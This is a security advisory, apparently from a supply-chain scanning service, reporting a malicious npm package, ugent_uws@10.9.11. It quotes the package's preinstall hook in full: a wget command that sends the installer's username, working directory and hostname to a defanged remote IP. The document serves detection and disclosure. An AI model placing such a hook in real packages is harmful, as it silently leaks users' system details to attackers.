LWA-2026-5356 confirmed malware
ugent_uws@10.9.11
Malicious code in ugent_uws (npm)
T1059.004 · Unix ShellT1082 · System Information DiscoveryT1071.001 · Web Protocols
Analysis
Package ugent_uws@10.9.11 contains no functional code — only a package.json with a malicious preinstall hook. On npm install, the preinstall hook silently executes: wget --quiet "hxxp://5[.]189[.]134[.]9:6060/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". This sends the installer's username, current working directory, and hostname to the remote IP 5[.]189[.]134[.]9:6060 via HTTP. The same beacon is configured in the test and preupdate lifecycle hooks. The package exposes no modules or exports — its only purpose is host reconnaissance during installation.
- analyzed by
- Leitwacht
- first seen
- Jun 15, 2026, 10:08 AM
- analyzed
- Jun 15, 2026, 10:09 AM
Related advisories
- ogd-analytics@1.0.0
- nic-datagov@1.0.0
- ts-enum-helper@1.0.0
- tether-base@99.0.0
- tecken@0.1.10
- electron-internal-utils@1.0.0
- skipthedishes_react@0.1.0
- server-up-ndot@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.